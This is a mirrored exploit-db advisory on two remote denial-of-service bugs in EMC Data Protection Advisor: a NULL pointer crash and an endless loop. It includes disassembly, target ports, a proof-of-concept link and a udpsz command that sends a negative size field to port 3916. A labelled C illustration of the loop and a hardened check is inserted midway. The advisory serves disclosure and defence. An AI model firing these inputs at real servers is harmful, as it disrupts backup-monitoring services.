exploit-db-mirror/exploits/hardware/dos/18688.txt
Offensive Security 36c084c351 DB: 2021-09-03
#######################################################################
Luigi Auriemma
Application: EMC Data Protection Advisor
http://www.emc.com/backup-and-recovery/data-protection-advisor/data-protection-advisor.htm
Versions: <= 5.8.1
Platforms: AIX, HP-UX, Linux, Solaris, Windows
Bugs: A] cProcessAuthenticationData NULL pointer
B] thread CPU 100%
Exploitation: remote
Date: 29 Mar 2012
Author: Luigi Auriemma
e-mail: aluigi@autistici.org
web: aluigi.org
#######################################################################
1) Introduction
2) Bugs
3) The Code
4) Fix
#######################################################################
===============
1) Introduction
===============
From vendor's homepage:
"EMC Data Protection Advisor: Manage service levels, reduce complexity,
and eliminate manual efforts with EMC's powerful data protection
management software that automates monitoring, analysis, alerting, and
reporting across backup, replication, and virtual environments."
#######################################################################
=======
2) Bugs
=======
------------------------------------------
A] cProcessAuthenticationData NULL pointer
------------------------------------------
A missing password field, or an empty password, in the
AUTHENTICATECONNECTION command (which is required to log in) leads to a
NULL pointer dereference in the DPA_Utilities.cProcessAuthenticationData
function:
10042EA0 /$ 55 PUSH EBP
10042EA1 |. 8BEC MOV EBP,ESP
10042EA3 |. 83EC 0C SUB ESP,0C
10042EA6 |. A1 B04F0C10 MOV EAX,DWORD PTR DS:[100C4FB0]
10042EAB |. 33C5 XOR EAX,EBP
10042EAD |. 8945 FC MOV DWORD PTR SS:[EBP-4],EAX
10042EB0 |. 53 PUSH EBX
10042EB1 |. 56 PUSH ESI
10042EB2 |. 8BF1 MOV ESI,ECX
10042EB4 |. 57 PUSH EDI
10042EB5 |. 56 PUSH ESI
10042EB6 |. E8 93E3FBFF CALL DPA_Util.decodeString
10042EBB |. 8BC8 MOV ECX,EAX
10042EBD |. 83C4 08 ADD ESP,8
10042EC0 |. 8D59 01 LEA EBX,DWORD PTR DS:[ECX+1]
10042EC3 |> 8A11 /MOV DL,BYTE PTR DS:[ECX] ; strlen() NULL pointer
10042EC5 |. 83C1 01 |ADD ECX,1
10042EC8 |. 84D2 |TEST DL,DL
10042ECA |.^75 F7 \JNZ SHORT DPA_Util.10042EC3
------------------
B] thread CPU 100%
------------------
An endless loop in the DPA_Utilities library while handling the protocol
when a negative 64-bit size field is used:
100138FC > 3BF1 CMP ESI,ECX
100138FE . 75 0C JNZ SHORT DPA_Util.1001390C
10013900 . 8B55 E4 MOV EDX,DWORD PTR SS:[EBP-1C]
10013903 . 0B55 E8 OR EDX,DWORD PTR SS:[EBP-18]
10013906 . 0F84 C1020000 JE DPA_Util.10013BCD
1001390C > 2975 DC SUB DWORD PTR SS:[EBP-24],ESI
1001390F . 68 20870910 PUSH DPA_Util.10098720 ; "nsReadRequest"
...
100137F0 > 8B7D 08 MOV EDI,DWORD PTR SS:[EBP+8]
100137F3 > 8B75 E4 MOV ESI,DWORD PTR SS:[EBP-1C]
100137F6 > 837D E8 00 CMP DWORD PTR SS:[EBP-18],0 ; signed comparison
100137FA . 7F 4A JG SHORT DPA_Util.10013846
100137FC . 7C 04 JL SHORT DPA_Util.10013802
100137FE . 85F6 TEST ESI,ESI
10013800 . 77 44 JA SHORT DPA_Util.10013846
10013802 > 837D E0 00 CMP DWORD PTR SS:[EBP-20],0 ; signed comparison
10013806 . 0F8C 0B040000 JL DPA_Util.10013C17
1001380C . 7F 0A JG SHORT DPA_Util.10013818
1001380E . 837D DC 00 CMP DWORD PTR SS:[EBP-24],0
10013812 . 0F86 FF030000 JBE DPA_Util.10013C17
10013818 > BF 1B700910 MOV EDI,DPA_Util.1009701B
1001381D . 33F6 XOR ESI,ESI
1001381F > 33C9 XOR ECX,ECX
10013821 . 894D F4 MOV DWORD PTR SS:[EBP-C],ECX
10013824 . 894D F0 MOV DWORD PTR SS:[EBP-10],ECX
10013827 . 390B CMP DWORD PTR DS:[EBX],ECX
10013829 . 894D F8 MOV DWORD PTR SS:[EBP-8],ECX
1001382C . 894D EC MOV DWORD PTR SS:[EBP-14],ECX
1001382F . 0F84 C7000000 JE DPA_Util.100138FC
Note that this loop does not affect the other connections to the
affected service.
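As an added illustration (not part of this advisory and not EMC's code), the signed handling of the 64-bit size field shown above, modelled in C next to a hardened check that rejects the request before any loop runs. The 8-byte little-endian layout, the MAX_REQUEST bound, the sample messages and the function names are assumptions made for the example.

```c
#include <stdint.h>
#include <stddef.h>

/* Constructed layout for this example: an 8-byte little-endian size field
 * followed by the request body. The real DPA wire format is not given in
 * the advisory; only the signed handling of the 64-bit size matters here. */
#define MAX_REQUEST 0x100000u   /* assumed sane upper bound on a request body */

static uint64_t read_u64le(const uint8_t *p) {
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | p[i];
    return v;
}

/* Constructed samples: a 4-byte body with size 4, and the same body with
 * size 18446744073709551615 (0xFFFFFFFFFFFFFFFF, i.e. -1 as an int64). */
const uint8_t GOOD_MSG[] = { 4,0,0,0,0,0,0,0, 'A','B','C','D' };
const uint8_t BAD_MSG[]  = { 0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF, 'A','B','C','D' };

/* Mirrors the signed checks at 100137F6/100137FA: a size whose high dword
 * is negative never takes the read branch, so nothing is consumed and the
 * remaining counter (SUB [EBP-24],ESI with ESI == 0) never moves.
 * The spin is capped at max_iters so this example terminates; a return
 * value equal to max_iters means the real handler would loop forever. */
size_t vulnerable_read_loop(const uint8_t *msg, size_t msg_len, size_t max_iters) {
    int64_t size = (int64_t)read_u64le(msg);   /* wraps to -1 for BAD_MSG */
    size_t remaining = msg_len - 8, iters = 0;
    while (remaining > 0 && iters < max_iters) {
        size_t chunk = 0;
        iters++;
        if (size > 0)                          /* signed compare: -1 fails */
            chunk = ((uint64_t)size < remaining) ? (size_t)size : remaining;
        remaining -= chunk;                    /* chunk == 0 -> no progress */
    }
    return iters;
}

/* Hardened variant: treat the field as unsigned, bound it by a maximum and
 * by the bytes actually present, and reject the request up front.
 * Returns the number of bytes consumed, or 0 when the request is rejected. */
size_t hardened_read_request(const uint8_t *msg, size_t msg_len) {
    if (msg_len < 8) return 0;
    uint64_t size = read_u64le(msg);
    size_t avail = msg_len - 8;
    if (size == 0 || size > MAX_REQUEST || size > avail) return 0;
    return 8 + (size_t)size;
}
```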
Both bugs can be exploited in the following services:
- DPA_Controller on port 3916
- DPA_Listener on port 4001
#######################################################################
===========
3) The Code
===========
A]
http://aluigi.org/poc/dpa_1.zip
dpa_1 SERVER
B]
http://aluigi.org/testz/udpsz.zip
udpsz -c "18446744073709551615/1/UNB" -T SERVER 3916 -1
#######################################################################
======
4) Fix
======
No fix.
#######################################################################